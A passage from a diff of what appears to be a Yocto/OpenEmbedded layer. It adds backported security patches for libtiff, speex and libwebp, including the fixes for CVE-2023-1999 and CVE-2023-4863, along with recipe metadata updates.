20 _TIFFfree(data);
21 return(0);
22 }
23- _TIFFmemcpy(resizeddata,data,(uint32)dir->tdir_count*sizeof(uint64));
24- _TIFFmemset(resizeddata+(uint32)dir->tdir_count,0,(nstrips-(uint32)dir->tdir_count)*sizeof(uint64));
25+ if( dir->tdir_count )
26+ _TIFFmemcpy(resizeddata,data, (uint32)dir->tdir_count * sizeof(uint64));
27+ _TIFFmemset(resizeddata+(uint32)dir->tdir_count, 0, (nstrips - (uint32)dir->tdir_count) * sizeof(uint64));
28 _TIFFfree(data);
29 data=resizeddata;
30 }
diff --git a/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb b/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
index 1f92c18513..7efaba3a38 100644
--- a/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
+++ b/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
@@ -1,10 +1,59 @@
1SUMMARY = "Provides support for the Tag Image File Format (TIFF)" 1SUMMARY = "Provides support for the Tag Image File Format (TIFF)"
2DESCRIPTION = "Library provides support for the Tag Image File Format \
3(TIFF), a widely used format for storing image data. This library \
4provide means to easily access and create TIFF image files."
5HOMEPAGE = "http://www.libtiff.org/"
2LICENSE = "BSD-2-Clause" 6LICENSE = "BSD-2-Clause"
3LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=34da3db46fab7501992f9615d7e158cf" 7LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=34da3db46fab7501992f9615d7e158cf"
4 8
5CVE_PRODUCT = "libtiff" 9CVE_PRODUCT = "libtiff"
6 10
7SRC_URI = "http://download.osgeo.org/libtiff/tiff-${PV}.tar.gz \ 11SRC_URI = "http://download.osgeo.org/libtiff/tiff-${PV}.tar.gz \
12 file://CVE-2020-35523.patch \
13 file://CVE-2020-35524-1.patch \
14 file://CVE-2020-35524-2.patch \
15 file://001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch \
16 file://002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch \
17 file://CVE-2020-35521_and_CVE-2020-35522.patch \
18 file://0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch \
19 file://561599c99f987dc32ae110370cfdd7df7975586b.patch \
20 file://eecb0712f4c3a5b449f70c57988260a667ddbdef.patch \
21 file://CVE-2022-0865.patch \
22 file://CVE-2022-0908.patch \
23 file://CVE-2022-0907.patch \
24 file://CVE-2022-0909.patch \
25 file://CVE-2022-0891.patch \
26 file://CVE-2022-0924.patch \
27 file://CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch \
28 file://CVE-2022-34526.patch \
29 file://CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch \
30 file://CVE-2022-1354.patch \
31 file://CVE-2022-1355.patch \
32 file://CVE-2022-3570_3598.patch \
33 file://CVE-2022-3597_3626_3627.patch \
34 file://CVE-2022-3599.patch \
35 file://CVE-2022-3970.patch \
36 file://CVE-2022-48281.patch \
37 file://CVE-2023-0795_0796_0797_0798_0799.patch \
38 file://CVE-2023-0800_0801_0802_0803_0804.patch \
39 file://CVE-2023-1916.patch \
40 file://CVE-2023-25433.patch \
41 file://CVE-2023-25434-CVE-2023-25435.patch \
42 file://CVE-2023-26965.patch \
43 file://CVE-2023-26966.patch \
44 file://CVE-2023-2908.patch \
45 file://CVE-2023-3316.patch \
46 file://CVE-2023-3576.patch \
47 file://CVE-2023-3618.patch \
48 file://CVE-2023-40745.patch \
49 file://CVE-2023-41175.patch \
50 file://CVE-2022-40090.patch \
51 file://CVE-2023-6228.patch \
52 file://CVE-2023-6277-1.patch \
53 file://CVE-2023-6277-2.patch \
54 file://CVE-2023-6277-3.patch \
55 file://CVE-2023-6277-4.patch \
56 file://CVE-2023-52356.patch \
8 " 57 "
9SRC_URI[md5sum] = "2165e7aba557463acc0664e71a3ed424" 58SRC_URI[md5sum] = "2165e7aba557463acc0664e71a3ed424"
10SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d6775b8634" 59SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d6775b8634"
@@ -12,6 +61,10 @@ SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d677
12# exclude betas 61# exclude betas
13UPSTREAM_CHECK_REGEX = "tiff-(?P<pver>\d+(\.\d+)+).tar" 62UPSTREAM_CHECK_REGEX = "tiff-(?P<pver>\d+(\.\d+)+).tar"
14 63
64# Tested with check from https://security-tracker.debian.org/tracker/CVE-2015-7313
65# and 4.1.0 doesn't have the issue
66CVE_CHECK_WHITELIST += "CVE-2015-7313"
67
15inherit autotools multilib_header 68inherit autotools multilib_header
16 69
17CACHED_CONFIGUREVARS = "ax_cv_check_gl_libgl=no" 70CACHED_CONFIGUREVARS = "ax_cv_check_gl_libgl=no"
diff --git a/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb b/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
index 00ca3675ca..d603602584 100644
--- a/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
+++ b/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
@@ -1,5 +1,9 @@
1SUMMARY = "Library and test program for decoding MPEG-2 and MPEG-1 video streams" 1SUMMARY = "Library and test program for decoding MPEG-2 and MPEG-1 video streams"
2HOMEPAGE = "http://libmpeg2.sourceforge.net/" 2DESCRIPTION = "mpeg2dec is a test program for libmpeg2. It decodes \
3mpeg-1 and mpeg-2 video streams, and also includes a demultiplexer \
4for mpeg-1 and mpeg-2 program streams. The main purpose of mpeg2dec \
5is to have a simple test bed for libmpeg2."
6HOMEPAGE = "https://libmpeg2.sourceforge.io/"
3SECTION = "libs" 7SECTION = "libs"
4LICENSE = "GPLv2+" 8LICENSE = "GPLv2+"
5LICENSE_FLAGS = "commercial" 9LICENSE_FLAGS = "commercial"
diff --git a/meta/recipes-multimedia/pulseaudio/pulseaudio.inc b/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
index 417eb1d9d3..317983edb2 100644
--- a/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
+++ b/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
@@ -1,4 +1,6 @@
1SUMMARY = "Sound server for Linux and Unix-like operating systems" 1SUMMARY = "Sound server for Linux and Unix-like operating systems"
2DESCRIPTION = "A general purpose sound server intended to run as a middleware \
3between your applications and your hardware devices, either using ALSA or OSS."
2HOMEPAGE = "http://www.pulseaudio.org" 4HOMEPAGE = "http://www.pulseaudio.org"
3AUTHOR = "Lennart Poettering" 5AUTHOR = "Lennart Poettering"
4SECTION = "libs/multimedia" 6SECTION = "libs/multimedia"
diff --git a/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch b/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch
new file mode 100644
index 0000000000..eb16e95ffc
--- /dev/null
+++ b/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch
@@ -0,0 +1,30 @@
1Backport patch to fix CVE-2020-23903.
2
3CVE: CVE-2020-23903
4Upstream-Status: Backport [https://github.com/xiph/speex/commit/870ff84]
5
6Signed-off-by: Kai Kang <kai.kang@windriver.com>
7
8From 870ff845b32f314aec0036641ffe18aba4916887 Mon Sep 17 00:00:00 2001
9From: Tristan Matthews <tmatth@videolan.org>
10Date: Mon, 13 Jul 2020 23:25:03 -0400
11Subject: [PATCH] wav_io: guard against invalid channel numbers
12
13Fixes #13
14---
15 src/wav_io.c | 2 +-
16 1 file changed, 1 insertion(+), 1 deletion(-)
17
18diff --git a/src/wav_io.c b/src/wav_io.c
19index b5183015..09d62eb0 100644
20--- a/src/wav_io.c
21+++ b/src/wav_io.c
22@@ -111,7 +111,7 @@ int read_wav_header(FILE *file, int *rate, int *channels, int *format, spx_int32
23 stmp = le_short(stmp);
24 *channels = stmp;
25
26- if (stmp>2)
27+ if (stmp>2 || stmp<1)
28 {
29 fprintf (stderr, "Only mono and (intensity) stereo supported\n");
30 return -1;
diff --git a/meta/recipes-multimedia/speex/speex_1.2.0.bb b/meta/recipes-multimedia/speex/speex_1.2.0.bb
index 3a0911d6f8..ea475f0f1b 100644
--- a/meta/recipes-multimedia/speex/speex_1.2.0.bb
+++ b/meta/recipes-multimedia/speex/speex_1.2.0.bb
@@ -7,7 +7,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=314649d8ba9dd7045dfb6683f298d0a8 \
7 file://include/speex/speex.h;beginline=1;endline=34;md5=ef8c8ea4f7198d71cf3509c6ed05ea50" 7 file://include/speex/speex.h;beginline=1;endline=34;md5=ef8c8ea4f7198d71cf3509c6ed05ea50"
8DEPENDS = "libogg speexdsp" 8DEPENDS = "libogg speexdsp"
9 9
10SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz" 10SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz \
11 file://CVE-2020-23903.patch \
12 "
11UPSTREAM_CHECK_REGEX = "speex-(?P<pver>\d+(\.\d+)+)\.tar" 13UPSTREAM_CHECK_REGEX = "speex-(?P<pver>\d+(\.\d+)+)\.tar"
12 14
13SRC_URI[md5sum] = "8ab7bb2589110dfaf0ed7fa7757dc49c" 15SRC_URI[md5sum] = "8ab7bb2589110dfaf0ed7fa7757dc49c"
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch b/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch
new file mode 100644
index 0000000000..d293ab93ab
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch
@@ -0,0 +1,55 @@
1From a486d800b60d0af4cc0836bf7ed8f21e12974129 Mon Sep 17 00:00:00 2001
2From: James Zern <jzern@google.com>
3Date: Wed, 22 Feb 2023 22:15:47 -0800
4Subject: [PATCH] EncodeAlphaInternal: clear result->bw on error
5
6This avoids a double free should the function fail prior to
7VP8BitWriterInit() and a previous trial result's buffer carried over.
8Previously in ApplyFiltersAndEncode() trial.bw (with a previous
9iteration's buffer) would be freed, followed by best.bw pointing to the
10same buffer.
11
12Since:
13187d379d add a fallback to ALPHA_NO_COMPRESSION
14
15In addition, check the return value of VP8BitWriterInit() in this
16function.
17
18Bug: webp:603
19Change-Id: Ic258381ee26c8c16bc211d157c8153831c8c6910
20
21CVE: CVE-2023-1999
22Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/a486d800b60d0af4cc0836bf7ed8f21e12974129]
23Signed-off-by: Nikhil R <nikhil.r@kpit.com>
24---
25 src/enc/alpha_enc.c | 4 +++-
26 1 file changed, 3 insertions(+), 1 deletion(-)
27
28diff --git a/src/enc/alpha_enc.c b/src/enc/alpha_enc.c
29index f7c02690e3..7d205586fe 100644
30--- a/src/enc/alpha_enc.c
31+++ b/src/enc/alpha_enc.c
32@@ -13,6 +13,7 @@
33
34 #include <assert.h>
35 #include <stdlib.h>
36+#include <string.h>
37
38 #include "src/enc/vp8i_enc.h"
39 #include "src/dsp/dsp.h"
40@@ -148,6 +149,7 @@ static int EncodeAlphaInternal(const uint8_t* const data, int width, int height,
41 }
42 } else {
43 VP8LBitWriterWipeOut(&tmp_bw);
44+ memset(&result->bw, 0, sizeof(result->bw));
45 return 0;
46 }
47 }
48@@ -162,7 +164,7 @@ static int EncodeAlphaInternal(const uint8_t* const data, int width, int height,
49 header = method | (filter << 2);
50 if (reduce_levels) header |= ALPHA_PREPROCESSED_LEVELS << 4;
51
52- VP8BitWriterInit(&result->bw, ALPHA_HEADER_LEN + output_size);
53+ if (!VP8BitWriterInit(&result->bw, ALPHA_HEADER_LEN + output_size)) ok = 0;
54 ok = ok && VP8BitWriterAppend(&result->bw, &header, ALPHA_HEADER_LEN);
55 ok = ok && VP8BitWriterAppend(&result->bw, output, output_size);
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch
new file mode 100644
index 0000000000..419b12f7d9
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch
@@ -0,0 +1,366 @@
1From 902bc9190331343b2017211debcec8d2ab87e17a Mon Sep 17 00:00:00 2001
2From: Vincent Rabaud <vrabaud@google.com>
3Date: Thu, 7 Sep 2023 21:16:03 +0200
4Subject: [PATCH 1/2] Fix OOB write in BuildHuffmanTable.
5
6First, BuildHuffmanTable is called to check if the data is valid.
7If it is and the table is not big enough, more memory is allocated.
8
9This will make sure that valid (but unoptimized because of unbalanced
10codes) streams are still decodable.
11
12Bug: chromium:1479274
13Change-Id: I31c36dbf3aa78d35ecf38706b50464fd3d375741
14
15CVE: CVE-2023-4863
16
17Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/902bc9190331343b2017211debcec8d2ab87e17a]
18
19Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
20---
21 src/dec/vp8l_dec.c | 46 ++++++++++---------
22 src/dec/vp8li_dec.h | 2 +-
23 src/utils/huffman_utils.c | 97 +++++++++++++++++++++++++++++++--------
24 src/utils/huffman_utils.h | 27 +++++++++--
25 4 files changed, 129 insertions(+), 43 deletions(-)
26
27diff --git a/src/dec/vp8l_dec.c b/src/dec/vp8l_dec.c
28index 93615d4..0d38314 100644
29--- a/src/dec/vp8l_dec.c
30+++ b/src/dec/vp8l_dec.c
31@@ -253,11 +253,11 @@ static int ReadHuffmanCodeLengths(
32 int symbol;
33 int max_symbol;
34 int prev_code_len = DEFAULT_CODE_LENGTH;
35- HuffmanCode table[1 << LENGTHS_TABLE_BITS];
36+ HuffmanTables tables;
37
38- if (!VP8LBuildHuffmanTable(table, LENGTHS_TABLE_BITS,
39- code_length_code_lengths,
40- NUM_CODE_LENGTH_CODES)) {
41+ if (!VP8LHuffmanTablesAllocate(1 << LENGTHS_TABLE_BITS, &tables) ||
42+ !VP8LBuildHuffmanTable(&tables, LENGTHS_TABLE_BITS,
43+ code_length_code_lengths, NUM_CODE_LENGTH_CODES)) {
44 goto End;
45 }
46
47@@ -277,7 +277,7 @@ static int ReadHuffmanCodeLengths(
48 int code_len;
49 if (max_symbol-- == 0) break;
50 VP8LFillBitWindow(br);
51- p = &table[VP8LPrefetchBits(br) & LENGTHS_TABLE_MASK];
52+ p = &tables.curr_segment->start[VP8LPrefetchBits(br) & LENGTHS_TABLE_MASK];
53 VP8LSetBitPos(br, br->bit_pos_ + p->bits);
54 code_len = p->value;
55 if (code_len < kCodeLengthLiterals) {
56@@ -300,6 +300,7 @@ static int ReadHuffmanCodeLengths(
57 ok = 1;
58
59 End:
60+ VP8LHuffmanTablesDeallocate(&tables);
61 if (!ok) dec->status_ = VP8_STATUS_BITSTREAM_ERROR;
62 return ok;
63 }
64@@ -307,7 +308,8 @@ static int ReadHuffmanCodeLengths(
65 // 'code_lengths' is pre-allocated temporary buffer, used for creating Huffman
66 // tree.
67 static int ReadHuffmanCode(int alphabet_size, VP8LDecoder* const dec,
68- int* const code_lengths, HuffmanCode* const table) {
69+ int* const code_lengths,
70+ HuffmanTables* const table) {
71 int ok = 0;
72 int size = 0;
73 VP8LBitReader* const br = &dec->br_;
74@@ -362,8 +364,7 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
75 VP8LMetadata* const hdr = &dec->hdr_;
76 uint32_t* huffman_image = NULL;
77 HTreeGroup* htree_groups = NULL;
78- HuffmanCode* huffman_tables = NULL;
79- HuffmanCode* huffman_table = NULL;
80+ HuffmanTables* huffman_tables = &hdr->huffman_tables_;
81 int num_htree_groups = 1;
82 int num_htree_groups_max = 1;
83 int max_alphabet_size = 0;
84@@ -372,6 +373,10 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
85 int* mapping = NULL;
86 int ok = 0;
87
88+ // Check the table has been 0 initialized (through InitMetadata).
89+ assert(huffman_tables->root.start == NULL);
90+ assert(huffman_tables->curr_segment == NULL);
91+
92 if (allow_recursion && VP8LReadBits(br, 1)) {
93 // use meta Huffman codes.
94 const int huffman_precision = VP8LReadBits(br, 3) + 2;
95@@ -434,16 +439,15 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
96
97 code_lengths = (int*)WebPSafeCalloc((uint64_t)max_alphabet_size,
98 sizeof(*code_lengths));
99- huffman_tables = (HuffmanCode*)WebPSafeMalloc(num_htree_groups * table_size,
100- sizeof(*huffman_tables));
101 htree_groups = VP8LHtreeGroupsNew(num_htree_groups);
102
103- if (htree_groups == NULL || code_lengths == NULL || huffman_tables == NULL) {
104+ if (htree_groups == NULL || code_lengths == NULL ||
105+ !VP8LHuffmanTablesAllocate(num_htree_groups * table_size,
106+ huffman_tables)) {
107 dec->status_ = VP8_STATUS_OUT_OF_MEMORY;
108 goto Error;
109 }
110
111- huffman_table = huffman_tables;
112 for (i = 0; i < num_htree_groups_max; ++i) {
113 // If the index "i" is unused in the Huffman image, just make sure the
114 // coefficients are valid but do not store them.
115@@ -468,19 +472,20 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
116 int max_bits = 0;
117 for (j = 0; j < HUFFMAN_CODES_PER_META_CODE; ++j) {
118 int alphabet_size = kAlphabetSize[j];
119- htrees[j] = huffman_table;
120 if (j == 0 && color_cache_bits > 0) {
121 alphabet_size += (1 << color_cache_bits);
122 }
123- size = ReadHuffmanCode(alphabet_size, dec, code_lengths, huffman_table);
124+ size =
125+ ReadHuffmanCode(alphabet_size, dec, code_lengths, huffman_tables);
126+ htrees[j] = huffman_tables->curr_segment->curr_table;
127 if (size == 0) {
128 goto Error;
129 }
130 if (is_trivial_literal && kLiteralMap[j] == 1) {
131- is_trivial_literal = (huffman_table->bits == 0);
132+ is_trivial_literal = (htrees[j]->bits == 0);
133 }
134- total_size += huffman_table->bits;
135- huffman_table += size;
136+ total_size += htrees[j]->bits;
137+ huffman_tables->curr_segment->curr_table += size;
138 if (j <= ALPHA) {
139 int local_max_bits = code_lengths[0];
140 int k;
141@@ -515,14 +520,13 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
142 hdr->huffman_image_ = huffman_image;
143 hdr->num_htree_groups_ = num_htree_groups;
144 hdr->htree_groups_ = htree_groups;
145- hdr->huffman_tables_ = huffman_tables;
146
147 Error:
148 WebPSafeFree(code_lengths);
149 WebPSafeFree(mapping);
150 if (!ok) {
151 WebPSafeFree(huffman_image);
152- WebPSafeFree(huffman_tables);
153+ VP8LHuffmanTablesDeallocate(huffman_tables);
154 VP8LHtreeGroupsFree(htree_groups);
155 }
156 return ok;
157@@ -1354,7 +1358,7 @@ static void ClearMetadata(VP8LMetadata* const hdr) {
158 assert(hdr != NULL);
159
160 WebPSafeFree(hdr->huffman_image_);
161- WebPSafeFree(hdr->huffman_tables_);
162+ VP8LHuffmanTablesDeallocate(&hdr->huffman_tables_);
163 VP8LHtreeGroupsFree(hdr->htree_groups_);
164 VP8LColorCacheClear(&hdr->color_cache_);
165 VP8LColorCacheClear(&hdr->saved_color_cache_);
166@@ -1670,7 +1674,7 @@ int VP8LDecodeImage(VP8LDecoder* const dec) {
167 // Sanity checks.
168 if (dec == NULL) return 0;
169
170- assert(dec->hdr_.huffman_tables_ != NULL);
171+ assert(dec->hdr_.huffman_tables_.root.start != NULL);
172 assert(dec->hdr_.htree_groups_ != NULL);
173 assert(dec->hdr_.num_htree_groups_ > 0);
174
175diff --git a/src/dec/vp8li_dec.h b/src/dec/vp8li_dec.h
176index 72b2e86..32540a4 100644
177--- a/src/dec/vp8li_dec.h
178+++ b/src/dec/vp8li_dec.h
179@@ -51,7 +51,7 @@ typedef struct {
180 uint32_t* huffman_image_;
181 int num_htree_groups_;
182 HTreeGroup* htree_groups_;
183- HuffmanCode* huffman_tables_;
184+ HuffmanTables huffman_tables_;
185 } VP8LMetadata;
186
187 typedef struct VP8LDecoder VP8LDecoder;
188diff --git a/src/utils/huffman_utils.c b/src/utils/huffman_utils.c
189index 0cba0fb..9efd628 100644
190--- a/src/utils/huffman_utils.c
191+++ b/src/utils/huffman_utils.c
192@@ -177,21 +177,24 @@ static int BuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
193 if (num_open < 0) {
194 return 0;
195 }
196- if (root_table == NULL) continue;
197 for (; count[len] > 0; --count[len]) {
198 HuffmanCode code;
199 if ((key & mask) != low) {
200- table += table_size;
201+ if (root_table != NULL) table += table_size;
202 table_bits = NextTableBitSize(count, len, root_bits);
203 table_size = 1 << table_bits;
204 total_size += table_size;
205 low = key & mask;
206- root_table[low].bits = (uint8_t)(table_bits + root_bits);
207- root_table[low].value = (uint16_t)((table - root_table) - low);
208+ if (root_table != NULL) {
209+ root_table[low].bits = (uint8_t)(table_bits + root_bits);
210+ root_table[low].value = (uint16_t)((table - root_table) - low);
211+ }
212+ }
213+ if (root_table != NULL) {
214+ code.bits = (uint8_t)(len - root_bits);
215+ code.value = (uint16_t)sorted[symbol++];
216+ ReplicateValue(&table[key >> root_bits], step, table_size, code);
217 }
218- code.bits = (uint8_t)(len - root_bits);
219- code.value = (uint16_t)sorted[symbol++];
220- ReplicateValue(&table[key >> root_bits], step, table_size, code);
221 key = GetNextKey(key, len);
222 }
223 }
224@@ -211,25 +214,83 @@ static int BuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
225 ((1 << MAX_CACHE_BITS) + NUM_LITERAL_CODES + NUM_LENGTH_CODES)
226 // Cut-off value for switching between heap and stack allocation.
227 #define SORTED_SIZE_CUTOFF 512
228-int VP8LBuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
229+int VP8LBuildHuffmanTable(HuffmanTables* const root_table, int root_bits,
230 const int code_lengths[], int code_lengths_size) {
231- int total_size;
232+ const int total_size =
233+ BuildHuffmanTable(NULL, root_bits, code_lengths, code_lengths_size, NULL);
234 assert(code_lengths_size <= MAX_CODE_LENGTHS_SIZE);
235- if (root_table == NULL) {
236- total_size = BuildHuffmanTable(NULL, root_bits,
237- code_lengths, code_lengths_size, NULL);
238- } else if (code_lengths_size <= SORTED_SIZE_CUTOFF) {
239+ if (total_size == 0 || root_table == NULL) return total_size;
240+
241+ if (root_table->curr_segment->curr_table + total_size >=
242+ root_table->curr_segment->start + root_table->curr_segment->size) {
243+ // If 'root_table' does not have enough memory, allocate a new segment.
244+ // The available part of root_table->curr_segment is left unused because we
245+ // need a contiguous buffer.
246+ const int segment_size = root_table->curr_segment->size;
247+ struct HuffmanTablesSegment* next =
248+ (HuffmanTablesSegment*)WebPSafeMalloc(1, sizeof(*next));
249+ if (next == NULL) return 0;
250+ // Fill the new segment.
251+ // We need at least 'total_size' but if that value is small, it is better to
252+ // allocate a big chunk to prevent more allocations later. 'segment_size' is
253+ // therefore chosen (any other arbitrary value could be chosen).
254+ next->size = total_size > segment_size ? total_size : segment_size;
255+ next->start =
256+ (HuffmanCode*)WebPSafeMalloc(next->size, sizeof(*next->start));
257+ if (next->start == NULL) {
258+ WebPSafeFree(next);
259+ return 0;
260+ }
261+ next->curr_table = next->start;
262+ next->next = NULL;
263+ // Point to the new segment.
264+ root_table->curr_segment->next = next;
265+ root_table->curr_segment = next;
266+ }
267+ if (code_lengths_size <= SORTED_SIZE_CUTOFF) {
268 // use local stack-allocated array.
269 uint16_t sorted[SORTED_SIZE_CUTOFF];
270- total_size = BuildHuffmanTable(root_table, root_bits,
271- code_lengths, code_lengths_size, sorted);
272- } else { // rare case. Use heap allocation.
273+ BuildHuffmanTable(root_table->curr_segment->curr_table, root_bits,
274+ code_lengths, code_lengths_size, sorted);
275+ } else { // rare case. Use heap allocation.
276 uint16_t* const sorted =
277 (uint16_t*)WebPSafeMalloc(code_lengths_size, sizeof(*sorted));
278 if (sorted == NULL) return 0;
279- total_size = BuildHuffmanTable(root_table, root_bits,
280- code_lengths, code_lengths_size, sorted);
281+ BuildHuffmanTable(root_table->curr_segment->curr_table, root_bits,
282+ code_lengths, code_lengths_size, sorted);
283 WebPSafeFree(sorted);
284 }
285 return total_size;
286 }
287+
288+int VP8LHuffmanTablesAllocate(int size, HuffmanTables* huffman_tables) {
289+ // Have 'segment' point to the first segment for now, 'root'.
290+ HuffmanTablesSegment* const root = &huffman_tables->root;
291+ huffman_tables->curr_segment = root;
292+ // Allocate root.
293+ root->start = (HuffmanCode*)WebPSafeMalloc(size, sizeof(*root->start));
294+ if (root->start == NULL) return 0;
295+ root->curr_table = root->start;
296+ root->next = NULL;
297+ root->size = size;
298+ return 1;
299+}
300+
301+void VP8LHuffmanTablesDeallocate(HuffmanTables* const huffman_tables) {
302+ HuffmanTablesSegment *current, *next;
303+ if (huffman_tables == NULL) return;
304+ // Free the root node.
305+ current = &huffman_tables->root;
306+ next = current->next;
307+ WebPSafeFree(current->start);
308+ current->start = NULL;
309+ current->next = NULL;
310+ current = next;
311+ // Free the following nodes.
312+ while (current != NULL) {
313+ next = current->next;
314+ WebPSafeFree(current->start);
315+ WebPSafeFree(current);
316+ current = next;
317+ }
318+}
319diff --git a/src/utils/huffman_utils.h b/src/utils/huffman_utils.h
320index 13b7ad1..98415c5 100644
321--- a/src/utils/huffman_utils.h
322+++ b/src/utils/huffman_utils.h
323@@ -43,6 +43,29 @@ typedef struct {
324 // or non-literal symbol otherwise
325 } HuffmanCode32;
326
327+// Contiguous memory segment of HuffmanCodes.
328+typedef struct HuffmanTablesSegment {
329+ HuffmanCode* start;
330+ // Pointer to where we are writing into the segment. Starts at 'start' and
331+ // cannot go beyond 'start' + 'size'.
332+ HuffmanCode* curr_table;
333+ // Pointer to the next segment in the chain.
334+ struct HuffmanTablesSegment* next;
335+ int size;
336+} HuffmanTablesSegment;
337+
338+// Chained memory segments of HuffmanCodes.
339+typedef struct HuffmanTables {
340+ HuffmanTablesSegment root;
341+ // Currently processed segment. At first, this is 'root'.
342+ HuffmanTablesSegment* curr_segment;
343+} HuffmanTables;
344+
345+// Allocates a HuffmanTables with 'size' contiguous HuffmanCodes. Returns 0 on
346+// memory allocation error, 1 otherwise.
347+int VP8LHuffmanTablesAllocate(int size, HuffmanTables* huffman_tables);
348+void VP8LHuffmanTablesDeallocate(HuffmanTables* const huffman_tables);
349+
350 #define HUFFMAN_PACKED_BITS 6
351 #define HUFFMAN_PACKED_TABLE_SIZE (1u << HUFFMAN_PACKED_BITS)
352
353@@ -78,9 +101,7 @@ void VP8LHtreeGroupsFree(HTreeGroup* const htree_groups);
354 // the huffman table.
355 // Returns built table size or 0 in case of error (invalid tree or
356 // memory error).
357-// If root_table is NULL, it returns 0 if a lookup cannot be built, something
358-// > 0 otherwise (but not the table size).
359-int VP8LBuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
360+int VP8LBuildHuffmanTable(HuffmanTables* const root_table, int root_bits,
361 const int code_lengths[], int code_lengths_size);
362
363 #ifdef __cplusplus
364--
3652.40.0
366
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch
new file mode 100644
index 0000000000..c1eedb6100
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch
@@ -0,0 +1,53 @@
1From 95ea5226c870449522240ccff26f0b006037c520 Mon Sep 17 00:00:00 2001
2From: Vincent Rabaud <vrabaud@google.com>
3Date: Mon, 11 Sep 2023 16:06:08 +0200
4Subject: [PATCH 2/2] Fix invalid incremental decoding check.
5
6The first condition is only necessary if we have not read enough
7(enough being defined by src_last, not src_end which is the end
8of the image).
9The second condition now fits the comment below: "if not
10incremental, and we are past the end of buffer".
11
12BUG=oss-fuzz:62136
13
14Change-Id: I0700f67c62db8e1c02c2e429a069a71e606a5e4f
15
16CVE: CVE-2023-4863
17
18Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/95ea5226c870449522240ccff26f0b006037c520]
19
20Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
21---
22 src/dec/vp8l_dec.c | 15 +++++++++++++--
23 1 file changed, 13 insertions(+), 2 deletions(-)
24
25diff --git a/src/dec/vp8l_dec.c b/src/dec/vp8l_dec.c
26index 0d38314..684a5b6 100644
27--- a/src/dec/vp8l_dec.c
28+++ b/src/dec/vp8l_dec.c
29@@ -1237,9 +1237,20 @@ static int DecodeImageData(VP8LDecoder* const dec, uint32_t* const data,
30 }
31
32 br->eos_ = VP8LIsEndOfStream(br);
33- if (dec->incremental_ && br->eos_ && src < src_end) {
34+ // In incremental decoding:
35+ // br->eos_ && src < src_last: if 'br' reached the end of the buffer and
36+ // 'src_last' has not been reached yet, there is not enough data. 'dec' has to
37+ // be reset until there is more data.
38+ // !br->eos_ && src < src_last: this cannot happen as either the buffer is
39+ // fully read, either enough has been read to reach 'src_last'.
40+ // src >= src_last: 'src_last' is reached, all is fine. 'src' can actually go
41+ // beyond 'src_last' in case the image is cropped and an LZ77 goes further.
42+ // The buffer might have been enough or there is some left. 'br->eos_' does
43+ // not matter.
44+ assert(!dec->incremental_ || (br->eos_ && src < src_last) || src >= src_last);
45+ if (dec->incremental_ && br->eos_ && src < src_last) {
46 RestoreState(dec);
47- } else if (!br->eos_) {
48+ } else if ((dec->incremental_ && src >= src_last) || !br->eos_) {
49 // Process the remaining rows corresponding to last row-block.
50 if (process_func != NULL) {
51 process_func(dec, row > last_row ? last_row : row);
52--
532.40.0
diff --git a/meta/recipes-multimedia/webp/libwebp_1.1.0.bb b/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
index 68e5ae2b3c..88c36cb76c 100644
--- a/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
+++ b/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
